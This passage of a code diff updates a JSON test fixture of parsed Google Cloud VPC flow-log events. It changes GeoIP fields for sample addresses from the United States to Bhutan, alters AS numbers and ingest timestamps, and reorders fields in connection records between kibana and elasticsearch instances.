"preserve_original_event" + ], + "network": { + "community_id": "1:iiFy+S+g1JJvu9kZvA1ivEiN2EM=", + "bytes": 0, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 4, + "direction": "inbound" } }, { @@ -13065,11 +13702,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -13144,7 +13786,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391900700Z", + "ingested": "2021-12-14T14:43:27.415241365Z", "original": "{\"insertId\":\"bxuq05fhgmw90\",\"jsonPayload\":{\"bytes_sent\":\"4580\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33524},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461240929Z\",\"packets_sent\":\"60\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.789945697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.789945697Z", @@ -13155,9 +13797,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:16.593Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.139.99.242" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 92 + } + } + }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -13166,13 +13838,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65322, @@ -13180,6 +13855,16 @@ "ip": "67.43.156.13", "packets": 668 }, + "event": { + "ingested": "2021-12-14T14:43:27.415241790Z", + "original": "{\"insertId\":\"bxuq05fhgmw8w\",\"jsonPayload\":{\"bytes_sent\":\"270437\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65322},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"668\",\"reporter\":\"DEST\",\"rtt_msec\":\"92\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.703392247Z", + "end": "2019-06-14T03:49:55.408936364Z", + "id": "bxuq05fhgmw8w", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -13191,19 +13876,30 @@ "iana_number": "6", "packets": 668, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.139.99.242", + "67.43.156.13" ] }, - "gcp": { - "destination": { + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 92 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -13214,38 +13910,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 92 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391906300Z", - "original": "{\"insertId\":\"bxuq05fhgmw8w\",\"jsonPayload\":{\"bytes_sent\":\"270437\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65322},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"668\",\"reporter\":\"DEST\",\"rtt_msec\":\"92\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.703392247Z", - "end": "2019-06-14T03:49:55.408936364Z", - "id": "bxuq05fhgmw8w", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65322, @@ -13259,6 +13937,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415242508Z", + "original": "{\"insertId\":\"bxuq05fhgmw94\",\"jsonPayload\":{\"bytes_sent\":\"19019\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65322,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"604\",\"reporter\":\"SRC\",\"rtt_msec\":\"92\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.703392247Z", + "end": "2019-06-14T03:49:55.408936364Z", + "id": "bxuq05fhgmw94", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -13270,46 +13958,6 @@ "iana_number": "6", "packets": 604, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:16.593Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 92 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391911700Z", - "original": "{\"insertId\":\"bxuq05fhgmw94\",\"jsonPayload\":{\"bytes_sent\":\"19019\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65322,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"604\",\"reporter\":\"SRC\",\"rtt_msec\":\"92\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.703392247Z", - "end": "2019-06-14T03:49:55.408936364Z", - "id": "bxuq05fhgmw94", - "category": "network", - "type": "connection" } }, { @@ -13324,11 +13972,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -13400,7 +14053,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391917200Z", + "ingested": "2021-12-14T14:43:27.415242990Z", "original": "{\"insertId\":\"bxuq05fhgmw8x\",\"jsonPayload\":{\"bytes_sent\":\"16208\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33568,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789269849Z\",\"packets_sent\":\"80\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.455711202Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.455711202Z", @@ -13416,11 +14069,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -13498,7 +14156,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391922600Z", + "ingested": "2021-12-14T14:43:27.415243457Z", "original": "{\"insertId\":\"bxuq05fhgmw8v\",\"jsonPayload\":{\"bytes_sent\":\"9800\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789269849Z\",\"packets_sent\":\"120\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.455711202Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.455711202Z", @@ -13509,41 +14167,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "192.168.2.117", - "port": 58026, - "bytes": 1467, - "ip": "192.168.2.117", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:GlCQ5a9VOJVReAwOuh722hRVrD0=", - "bytes": 1467, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" @@ -13554,6 +14177,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -13574,8 +14200,28 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "America", + "country_name": "usa" + }, + "as": { + "number": 15169 + }, + "address": "192.168.2.117", + "port": 58026, + "bytes": 1467, + "ip": "192.168.2.117", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391928100Z", + "ingested": "2021-12-14T14:43:27.415244346Z", "original": "{\"insertId\":\"bxuq05fhgmw8z\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58026},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"40\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:49:08.995009558Z", @@ -13583,6 +14229,18 @@ "id": "bxuq05fhgmw8z", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:GlCQ5a9VOJVReAwOuh722hRVrD0=", + "bytes": 1467, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -13597,11 +14255,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -13670,7 +14333,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391933700Z", + "ingested": "2021-12-14T14:43:27.415244761Z", "original": "{\"insertId\":\"bxuq05fhgmw9b\",\"jsonPayload\":{\"bytes_sent\":\"19506\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33564,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597223164Z\",\"packets_sent\":\"180\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866699945Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866699945Z", @@ -13681,41 +14344,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 32882, - "bytes": 1496, - "ip": "67.43.156.13", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:FXnFBvk886dW60zh9GYIhTfux90=", - "bytes": 1496, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" @@ -13726,6 +14354,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -13746,8 +14377,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 32882, + "bytes": 1496, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391939500Z", + "ingested": "2021-12-14T14:43:27.415245255Z", "original": "{\"insertId\":\"bxuq05fhgmw8y\",\"jsonPayload\":{\"bytes_sent\":\"1496\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":32882},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:44:07.689331553Z", @@ -13755,6 +14411,18 @@ "id": "bxuq05fhgmw8y", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:FXnFBvk886dW60zh9GYIhTfux90=", + "bytes": 1496, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -13845,7 +14513,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391945Z", + "ingested": "2021-12-14T14:43:27.415245644Z", "original": "{\"insertId\":\"bxuq05fhgmw9e\",\"jsonPayload\":{\"bytes_sent\":\"155675\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60126,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.101129310Z\",\"packets_sent\":\"288\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.019841536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.019841536Z", @@ -13856,18 +14524,53 @@ } }, { + "@timestamp": "2019-06-14T03:50:16.593Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "67.43.156.13" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", "port": 32882, "ip": "67.43.156.13" }, @@ -13879,6 +14582,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415246089Z", + "original": "{\"insertId\":\"bxuq05fhgmw98\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":32882,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:44:07.689331553Z", + "end": "2019-06-14T03:44:07.811355936Z", + "id": "bxuq05fhgmw98", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -13890,25 +14603,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.13" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -13919,23 +14631,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 15 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391950300Z", - "original": "{\"insertId\":\"bxuq05fhgmw98\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":32882,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": 